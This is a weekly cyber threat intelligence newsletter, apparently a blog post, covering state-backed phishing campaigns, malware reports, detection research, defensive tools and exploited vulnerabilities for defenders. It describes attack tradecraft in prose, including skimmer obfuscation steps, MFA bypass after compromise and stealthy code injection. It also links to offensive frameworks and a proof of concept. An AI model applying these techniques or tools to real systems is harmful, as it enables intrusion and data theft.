

Discover more from Cyber Defence Analysis for Blue & Purple Teams
Bluepurple Pulse: week ending February 26th
It is nearly spring in the northern hemisphere and in the great words of Emmet everything is awesome
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week nothing overly standout, the tempo remains the same. The mass compromise since November of a vendors backup software when exposed to the Internet which appears to have gone undetected until now is the most interesting (see reporting under ‘Exploitation’).
In the high-level this week:
Cyber-Attacks Must Be Reported in France to Authorities Within 72-Hours to Benefit from Insurance Coverage from April 24th - Good news but will lead to technical definitions and legal wrangling I suspect.
Hacks, Bots and Blackmail: How Secret Cyber Mercenaries Disrupt Elections - if true / accurate this is pretty explosive and Israel will likely be held to account for what it is allowing to happen from its shores.
Russian Businessman Found Guilty in $90 Million Hack-to-Trade Conspiracy - Defendant among five charged in global scheme that used non-public earnings reports stolen from U.S. computer networks to trade on dozens of stocks - stuff of Hollywood, long running case coming to conclusion.
Bahrain loses state immunity bid in dissidents' spyware lawsuit in UK - Bahrain cannot claim state immunity to block a lawsuit brought in Britain by two dissidents who say its government hacked their laptops with spyware, the High Court in London ruled on Wednesday.
FBI says it has 'contained' cyber incident on bureau's computer network - this should set a positive tone that everyone has incidents and we should talk about them.
Critical Infrastructure Protection: Time Frames to Complete DHS Efforts Would Help Sector Risk Management Agencies Implement Statutory Responsibilities - from the U.S. Government Accountability Office.
Social Engineering - A Coinbase Case Study - Coinbase recently experienced a cybersecurity attack that targeted one of its employees and executives should read this to appreciate what lengths threat actors will go to (also amazing transparency).
GoDaddy Inc. - Statement on recent website redirect issues - we discovered that an unauthorized third party had gained access to servers in our cPanel shared hosting environment and installed malware causing the intermittent redirection of customer websites - a long term and terrifying breach here. Talk about supply chains - this was potentially so many in one go..
German Constitutional Court strikes down predictive algorithms for policing - related there was also A Taxonomy of Trustworthiness for Artificial Intelligence.
Deadline for mandatory registration with Singapore SMS Sender ID Registry expired on 31 Jan 2023 - all non-registered SMS sender IDs [are] channeled to a sender ID with the header "Likely-SCAM" - this is only a good thing when we think about SMS phishing etc.
Pentagon and Microsoft Are Investigating Leak of Military Emails - an error that exposed at least a terabyte of military emails including personal information and conversations between officials - not a reason to not do cloud, but a reason to gain assurance you are doing it right. Not sure I agree with conflation that this was cloud specific.
Interoperable EU Risk Management Toolbox: This document presents the EU RM toolbox, a solution proposed by ENISA to address interoperability concerns related to the use of information security RM methods - clear cyber is getting all a little complicated and overlapping.
Man beats machine at Go in human victory over AI - shows AI/ML isn’t very good at spotting the ridiculous yet
Reflections this week come from watching this documentary on 3D printed firearms and the strong sense of de ja vu with early hacker culture more broadly i.e. counter culture, engineers, artists and libertarians etc. coming together. The implications for the future more broadly as technologies that were once out of the reach of many are no longer I find fascinating in and out of cyber.
On the interesting job/role front:
Cyber Threat Analyst, Cyber Threat Analysis Branch (CTAB) at NATO -
Research or Senior Fellow – CyberAI at CSET at Georgetown
Enjoying this? don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
Have a lovely Thursday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia / Ukraine
UAC-0114 (Wintervivern) Campaign, Targeting Ukrainian and Polish Gov Entities
Reporting on a campaign from the end of last month involving quite rudimentary tradecraft.
On January 30, 2023, a phishing email targeting The Ministry of Foreign Affairs of Ukraine was sent to the corporate email address from outside the organization (sender mfa_it_secp[@]outlook[.]com)
The link hxxps://troadsecow[.]com/mfa[.]gov[.]ua was provided within the email. The link text indicates that it would lead to mfa[.]gov[.]ua , but it actually leads to troadsecow[.]com , where a malicious .bat file is placed.
Russian APT “Gamaredon” Exploits Hoaxshell to Target Ukrainian Organizations
Gianluca Tiepolo and Rémi Arsene provide insight in this Russian threat actor’s latest MO. Again phishing, again macros … as per last week Content Disarm & Reconstruction is the answer here. When will the cloud email vendors offer it as a SaaS?
This analysis uncovers Gamaredon’s latest campaign, which targeted Ukrainian organizations by deploying Hoaxshell, a heavily obfuscated backdoor written in PowerShell
The attack vector consists of a spear-phishing email with minimal body content along with an attachment. Once the attachment is opened by the victim, the system will be compromised through the installation of a WebShell. Like in their prior operations, Gamaredon relies on the highly targeted distribution of weaponized documents. Their deceptive lures imitate official documents from real Ukrainian government organizations, meticulously crafted to deceive individuals who have legitimate reasons to interact with those organizations.
Several types of attachments were used to deliver malware. Some examples include .xlsx, .doc, .xlsm and .docm, of which .docm was the most prevalent.
Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
Aleksandar Milenkoski highlights a state backed threat actor who knows how to attack and utilize cloud in their operations. What will be interesting here is that the big cloud vendors should be able to track the development of the aforementioned capabilities.
A new threat cluster we track as WIP26 has been targeting telecommunication providers in the Middle East.
We assess it is likely that WIP26 is espionage-related.
WIP26 relies heavily on public Cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate.
WIP26 involves the use of backdoors, dubbed CMD365 and CMDEmber, which abuse Microsoft 365 Mail and Google Firebase services for C2 purposes.
WIP26 also involves the use of Microsoft Azure and Dropbox instances as data exfiltration and malware hosting sites.
Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia
Some regional and sector specific targeting with … yes you guessed it … more phishing payloads.
Hydrochasma, the threat actor behind this campaign, has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines.
This activity has been ongoing since at least October 2022.
The infection vector used by Hydrochasma was most likely a phishing email. The first suspicious activity seen on machines is a lure document with a file name in the victim organization’s native language that appears to indicate it was an email attachment:
[TRANSLATED FROM THE ORIGINAL] Product Specification-Freight-Company Qualification Information wps-pdf Export.pdf.exe
Another lure document appears to be mimicking a resume:
[TRANSLATED FROM THE ORIGINAL] [REDACTED] University-Development Engineer.exe
Hangeul (HWP) malware using steganography: RedEyes (ScarCruft)
South Korean reporting on North Korean use of stenography (second stage payloads in images). In this instance JPG files held the latter stages.
[We] confirmed in January that the RedEyes attack group (also known as APT37, ScarCruft) was distributing malware through the Hangul Encapsulated PostScript (EPS) vulnerability (CVE-2017-8291). did In this report, the latest domestic activities of the RedEyes group are shared.
RambleOn Android Malware - attributed to potentially being APT37
Ovi Liber provides insight into North Korean Android mobile capability. The initial access vector is social engineering. This has been attributed specifically to APT37/Kimsuky and what is of note is the modular Android framework deployed.
A Journalist in South Korea recently received malicious APK file suggested to be installed on the journalist’s phone, suggested by anonymous tipper.
It is found that the APK file and its behavior after installation contains critically malicious functionalities : including ability to read and leak target’s contact list, SMS, voice call content, location and others from the time of compromisation on the target.
The malicious APK file named as RambleOn on this report, contains unique characteristic of 1) using infrastructure of pCloud and Yandex, 2) usage of FCM service for C&C communication.
https://interlab.or.kr/archives/2567
SideWinder targeting Malaysia's KEMENTERIAN DALAM NEGERI MINISTRY OF HOME ADDAIRS in phishing attacks
twitter.com/BaoshengbinCumt/status/1626132020773679106?s=20
Molted skin: APT SideWinder 2021 campaign that targeted over 60 companies in the Asia-Pacific
An Indian threat actor’s 2021 campaign documented in glorious detail. The scale and breadth of the targets is interesting given their historical regional focuses. This is a little dated but it points to a statement of intent on behalf of the threat actor.
https://www.group-ib.com/media-center/press-releases/sidewinder-apt-report/
APT SideCopy Targeting Indian Government Entities
Changing gear we then having reporting on Pakistan operations in India. This reporting in around a new implant called ReverseRAT. Special mention once again for this vendor as they preclude copy and pasting from their reporting.
https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/
Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor
Circumstantially IIS tradecraft and Taiwan as a target gives me a working hypothesis that this might be China, but we don’t know. Anyway, whoever it is they have just had quite a novel IIS implant burnt.
The malware, dubbed Frebniis (Backdoor.Frebniis), was used by a currently unknown threat actor against targets in Taiwan.
The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests. This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution. In order to use this technique, an attacker needs to gain access to the Windows system running the IIS server by some other means. In this particular case, it is unclear how this access was achieved.
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
Earth Kitsune Delivers New WhiskerSpy Backdoor via Watering Hole Attack
Joseph C Chen and Jaromir Horejsi provide reporting on North Korean operations using watering holes. The point of note here is that browser exploits appear to have become scarcer for them so they have evolved into using social engineering in order to get their implants deployed.
We discovered a new backdoor which we have attributed to the advanced persistent threat actor known as Earth Kitsune, which we have covered before. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.
In many of the cases, we have investigated in the past, the threat actor used watering hole tactics by compromising websites related to North Korea and injecting browser exploits into them. In the latest activity we analyze here, Earth Kitsune used a similar tactic but instead of using browser exploits, employed social engineering instead.
https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html
Invitation to a Secret Event: Uncovering Earth Yako’s Campaigns
Hara Hiroaki, Yuka Higashi and Masaoki Shoji provide some Japanese and Taiwan regional reporting on an actor who started in 2021, is currently unattributed - although again due to victimology and the very targeting nature there are obvious suspects .. Again uses phishing!
Since January 2022, we have been observing Earth Yako as it targets researchers in the academe and research think tanks in Japan. We also observed a small number of attacks that appear to have targeted organizations in Taiwan.
In this campaign, Earth Yako uses a spearphishing link for initial access. The URL in the spearphishing mail downloads the compressed (.zip) or disc image (.iso) file containing a malicious shortcut file (.lnk) to download another payload. We observed several spearphishing emails masquerading as an invitation for a private or public meeting-like events, which leads to download the malware in the target system.
ALTOUFAN TEAM Targets the Middle East
This reporting is noteworthy due to the apparent breach of the social security system in Bahrain and an attempt to cause financial loss to the government by a threat actor unhappy with normalizing relationships between two countries. This is a real CNI attack outside of the telecommunications, energy and traditional finance sectors.
On February 13, 2023, the Threat Actor (TA) group ALTOUFAN TEAM on Telegram announced a campaign against Bahraini and Israeli websites to protest the normalization of relations between the two countries.
The TAs claimed they would carry out a hack to modify the pension wages of Bahrainis registered on the Social Insurance Organization “before dawn”.
At approximately 11:54 PM, The group shared a video as proof of compromise, claiming to have fully compromised the systems and servers of the Social Insurance Organization of Bahrain to raise the base wages of 4,000 insured and registered Bahraini citizens.
https://blog.cyble.com/2023/02/16/altoufan-team-targets-the-middle-east/
These aren’t the apps you’re looking for: fake installers targeting Southeast and East Asia
Matías Porolli and Fernando Tavella detail further malvertising campaigns being thrown a Chinese victims. You can see from the below the campaigns have been going on for more than nine months. Threat actor is unknown with a novel trick to entice deployment..
The attackers purchased advertisements to position their malicious websites in the “sponsored” section of Google search results. We reported these ads to Google and they were promptly removed.
The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China.
We observed victims mostly in Southeast and East Asia, suggesting that the advertisements were targeting that region.
We observed these attacks between August 2022 and January 2023, but according to our telemetry previous versions of the installers have been used since at least May 2022.
None of the malware or network infrastructure used in this campaign has been matched to known activities of any named groups, so for now we have not attributed this activity to any known group.
https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
Operation Silent Watch: Desktop Surveillance in Azerbaijan and Armenia
This reporting is of note due to the use of polygot files again. The initial access tradecraft is however standard phishing using file extensions from the 90s.
The newest version of OxtaRAT is a polyglot file, which combines compiled AutoIT script and an image. The tool capabilities include searching for and exfiltrating files from the infected machine, recording the video from the web camera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell, performing port scanning, and more.
Compared to previous campaigns of this threat actor, the latest campaign from November 2022 presents changes in the infection chain, improved operational security, and new functionality to improve the ways to steal the victim’s data.
The threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent media in Azerbaijan for several years. This is the first time there is a clear indication of these attackers using OxtaRAT against Armenian targets and targeting corporate environments.
Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs
Aliakbar Zahravi and Peter Girnus outline a criminal campaign aimed at the cryptocurrency industry. It should be noted that Microsoft have now mitigated the techniques used by this threat actor to noble Defender namely the ability to sandbox Defender. Specifically protected processes and token trust levels have been implemented 22H2 and 23H2.
We recently found an active campaign that uses a fake employment pretext targeting Eastern Europeans in the cryptocurrency industry to install an information stealer. In this campaign, the suspected Russian threat actors use several highly obfuscated and under-development custom loaders to infect those involved in the cryptocurrency industry with the Enigma Stealer (detected as TrojanSpy.MSIL.ENIGMASTEALER.YXDBC), a modified version of the Stealerium information stealer. In addition to these loaders, the attacker also exploits CVE-2015-2291, an Intel driver vulnerability, to load a malicious driver designed to reduce the token integrity of Microsoft Defender.
Threat actors are using fake Emsisoft code-signing certificates to disguise their attacks
Senan Conrad provides insight in to what feels like a concerted effort based on intelligence of the target organization.
We recently observed an incident in which a fake code-signing certificate supposedly belonging to Emsisoft was used in an attempt to obfuscate a targeted attack against one of our customers. The organization in question used our products and the attacker’s aim was to get that organization to allow an application the threat actor installed and intended to use by making its detection appear to be a false-positive.
Magecart Attack Disguised as Google Tag Manager
Roman Lvovsky documents the evolution in obfuscation tradecraft used by this criminal group. The IoCs are strong and should provide a good methodology for cyber defense / site reliability engineers to instrument checks for their estates using Burp Suite or similar.
The recent attack aimed to steal sensitive information from visitors on checkout pages and forms. The attackers were able to inject a malicious inline JavaScript code into the targeted websites by exploiting a vulnerability. The skimmer used techniques such as impersonating a legitimate third-party vendor, like Google Tag Manager, and hiding the malicious code through Base64 encoding.
In this instance, the inline snippet serves only as a loader and not as the actual attack code. The loader includes a condition that triggers the attack only on checkout pages, thereby allowing the skimmer to operate discreetly and load the full malicious code only on targeted, sensitive pages that are relevant to the attack.
Impersonate a known vendor code snippet like Google Tag Manager
Use Base64 encoding to hide any indicators of the attacker like URLs and domains
Use WebSockets for all the communication between the browser and the C2 — pulling the attack code and exfiltrating the data
Execute the attack code with “eval” to make the script look like an organic first-party script
Use obfuscation techniques to make it difficult for researchers to understand the code
Inject fake forms to collect data before redirecting to legitimate third-party payment service pages
https://www.akamai.com/blog/security/magecart-attack-disguised-as-google-tag-manager
New BPFDoor sample
From China with love..
https://www.virustotal.com/gui/file/aa477897c51958aee57d854a531684551c99c9f992fc8e70963f2f93c962bff8
Cut off the magic hand that endangers China's data security
Included for completeness as the Chinese response is as interesting as the activity.
The ATW organization was established in June 2021 , and in October it began to carry out activities on the " Array Forum " ( RaidForums ). Although the account signature is set to " National State Organization " , in fact, this is a loose network organization formed by people who are engaged in programmers and network engineers in Europe and North America.
Since its inception, the ATW organization has expressed a clear anti-China stance. It publicly stated that " it will mainly publish government data leak posts aimed at China, North Korea and other countries . " , blatantly supporting " Taiwan independence " , agitating " Hong Kong independence " , and hyping up " human rights issues " in Xinjiang .
Discovery
How we find and understand the latent compromises within our environments.
Velociraptor detection content
Matthew Green provides a work aid for those of you using Velociraptor.
A repository to share publicly available bulk Velociraptor detection content in an easy to consume way.
Current artifacts include:
Windows.Detection.Applications
Windows.Detection.BinaryRename
Windows.Detection.Evtx
Windows.Detection.HijackLibsEnv
Windows.Detection.HijackLibsMFT
Windows.Detection.MFT
Windows.Detection.NamedPipes
Windows.Detection.PowershellPSReadline
Windows.Detection.Webhistory
Windows.Detection.ZoneIdentifier
Server.StartHunts
https://github.com/mgreen27/DetectRaptor
Anomaly Detection in the Open World: Normality Shift Detection, Explanation, and Adaptation
Anomaly detection is held up as a holy grail but in reality is hard to get value from in practice in a lot of cases due to inherent noise/chaos. This work out of China is interesting for two reasons. First is the improvements made. Second is the size of the team involved - Dongqi Han, Zhiliang Wang, Wenqi Chen, Kai Wang, Rui Yu , Su Wang, Han Zhang , Zhihua Wang, Minghui Jin , Jiahai Yang, Xingang Shi and Xia Yin - I do get a sense that Western academic teams are underweight comparatively.
In this work, we are the first to explore the normality shift for deep learning-based anomaly detection in security applications, and propose OWAD, a general framework to detect, explain, and adapt to normality shift in practice. In particular, OWAD outperforms prior work by detecting shift in an unsupervised fashion, reducing the overhead of manual labeling, and providing better adaptation performance through distribution-level tackling. We demonstrate the effectiveness of OWAD through several realistic experiments on three security-related anomaly detection applications with long-term practical data. Results show that OWAD can provide better adaptation performance of normality shift with less labeling overhead. We provide case studies to analyze the normality shift and provide operational recommendations for security applications. We also conduct an initial real-world deployment on a SCADA security system
https://www.ndss-symposium.org/wp-content/uploads/2023/02/ndss2023_f830_paper.pdf
Zero-Shot Anomaly Detection without Foundation Models
Not cyber specific but Aodong Li, Chen Qiu, Marius Kloft, Padhraic Smyth, Maja Rudolph and Stephan Mandt provide some incremental performance improvements which likely could be applied to our domain.
Our solution relies on training an off-theshelf anomaly detector (such as a deep SVDD) on a set of inter-related data distributions in combination with batch normalization. This simple recipe–batch normalization plus meta-training–is a highly effective and versatile tool. Our results demonstrate the first zero-shot anomaly detection results for tabular data and SOTA zero-shot AD results for image data from specialized domains
https://arxiv.org/pdf/2302.07849.pdf
Defence
How we proactively defend our environments.
That Escalated Quickly: An ML Framework for Alert Prioritization
Ben Gelman, Salma Taoufiq, Tamás Vörös and Konstantin Berlin present some work which on the face of it have impressive performance returns. It will be interesting to see if/when this approach gets experimented with in the real-world if similar is seen in practice.
we present That Escalated Quickly (TEQ), a machine learning framework that reduces alert fatigue with minimal changes to SOC workflows by predicting alert-level and incident-level actionability. On real-world data, the system is able to reduce the time it takes to respond to actionable incidents by 22.9%, suppress 54% of false positives with a 95.1% detection rate, and reduce the number of alerts an analyst needs to investigate within singular incidents by 14%.
https://arxiv.org/abs/2302.06648
MAAD-AF - Attack Framework for testing M365 and AAD
Arpan Sarkar and David Brooks give us another cloud attack testing framework..
MAAD-AF is an open-source cloud attack tool developed for testing security of Microsoft 365 & Azure AD environments through adversary emulation. MAAD-AF provides security practitioners easy to use attack modules to exploit configurations across different M365/AzureAD cloud-based tools & services.
MAAD-AF is designed to make cloud security testing simple, fast and effective. Through its virtually no-setup requirement and easy to use interactive attack modules, security teams can test their security controls, detection and response capabilities easily and swiftly.
https://github.com/vectra-ai-research/MAAD-AF
Convert Sentinel Analytics Rules with PowerShell
Fabian Bader provides a work aid to all Sentinel teams out there 🫶
If you have worked with Microsoft Sentinel you will, at one point, stumbled over two different file formats for Analytics Rules: YAML and ARM.
I created a PowerShell module: SentinelARConverter
It has only two functions
Convert-SentinelARArmToYaml
andConvert-SentinelARYamlToArm
https://cloudbrothers.info/convert-sentinel-analytics-rules/
Tip of the CAP: Getting started with (Microsoft) Conditional Access Policies
Zac Fink gives pragmatic advice on how to reduce exposure to stolen credentials through conditional access policies.
https://redcanary.com/blog/conditional-access-policies/
Vulnerability
Our attack surface.
Fortiguard - FortiNAC - External Control of File Name or Path in keyUpload scriptlet
Resulting in remote code execution (see later for the exploit).
https://www.fortiguard.com/psirt/FG-IR-22-300
Account Takeover Vulnerability in a Popular Package Affecting 1000+ orgs
Supply chain threats in software once again demonstrated. A domain name associated with one of the maintainers of an npm package with over 3.5 million weekly downloads, had expired and is available for registration
The package can be taken over by recovering an expired domain name for one of its maintainers and resetting the password.
Even though npm has a mechanism that restricts user accounts to only one active email per account, the package’s associated GitHub account is recoverable.
With access to the GitHub account, a CI/CD automation token (used in publishing packages automatically) can be extracted from the project’s pipeline and used to publish new malicious packages on behalf of the maintainer account.
Offense
Attack capability, techniques and trade-craft.
MFA Phishing using noVNC and AWS
We’ve discussed this type of capability before - but here is the step by step how to guide for all threat actors out there. Get those detection tradecraft trigger fingers ready..
https://medium.com/@psychsecurity/mfa-phishing-using-novnc-and-aws-ebc781b4d093
Bypassing Okta MFA Credential Provider for Windows
A tip of where you might want to ensure some integrity checking occurs of your configuration to detect such modifications.
This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.
Biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making it less likely of a configuration. It also does not have “RDP Only” as the default, making the console bypass also less likely to be successful.
With that said, if you do have administrator level shell access, it is quite simple to disable.
https://www.n00py.io/2023/02/bypassing-okta-mfa-credential-provider-for-windows/
NimPlant: A light-weight first-stage C2 implant written in Nim
Cas van Cooten gives us another implant framework to contend with.
https://github.com/chvancooten/NimPlant
Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers
Ruben Boonen highlights the importance of passing positive noise through a system to ensure your telemetry isn’t blind.
analyze how attackers, with elevated privileges, can use their access to stage Windows Kernel post-exploitation capabilities. Over the last few years, public accounts have increasingly shown that less sophisticated attackers are using this technique to achieve their objectives. Specifically, in this post, we will evaluate how Kernel post-exploitation can be used to blind ETW sensors and tie that back to malware samples identified in-the-wild last year.
https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/
ntqueueapcthreadex-ntdll-gadget-injection: A novel way of using NtQueueApcThreadEx by abusing the ApcRoutine and SystemArgument[0-3] parameters
Lloyd Davies make EDR weep some more..
This novel way of using
NtQueueApcThreadEx
by abusing theApcRoutine
andSystemArgument[0-3]
parameters by passing a randompop r32; ret
gadget can be used for stealthy code injection. Within this PoC, the gadget in this case is picked randomly fromntdll.dll
's memory region which matches a specific pattern. This means the gadget returns into the shellcode.
https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection
Exploitation
What is being exploited.
CVE-2022-39952: Proof of Concept
Brace brace brace for the above Fortinet vulnerability.
https://github.com/horizon3ai/CVE-2022-39952
From Backup to Backdoor: Exploitation of CVE-2022-36537 in R1Soft Server Backup Manager
Stuff of nightmares right here, exploitation started four months ago and no one noticed.
During a recent incident response case, we found traces of an adversary leveraging ConnectWise R1Soft Server Backup Manager software (hereinafter: R1Soft server software). The adversary used it as an initial point of access and as a platform to control downstream systems connected via the R1Soft Backup Agent.
The adversary exploited the R1Soft server software via CVE-2022-36537 [1] [2], which is a vulnerability in the ZK Java Framework that R1Soft Server Backup Manager utilises.
Further research by us indicates that world-wide exploitation of R1Soft server software started around the end of November 2022.
Mirai Variant V3G4 Targets IoT Devices
Chao Lei, Zhibin Zhang, Cecilia Hu and Aveek Das give a sense of scale of the weaponization of known vulnerabilities in the IoT space by this botnet.
[We] observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
Gitorious Remote Command Execution Vulnerability
CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
Mitel AWC Remote Command Execution Vulnerability
CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
CVE-2019-15107: Webmin Command Injection Vulnerability
Spree Commerce Arbitrary Command Execution Vulnerability
FLIR Thermal Camera Remote Command Execution Vulnerability
CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Nothing this week
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
More than Half of All Phishing Sites Impersonate Financials in Q4
A Side-Channel Attack on a Hardware Implementation of CRYSTALS-Kyber
This newsletter is produced by BinaryFirefly, it is via BinaryFirefly I support a hand picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.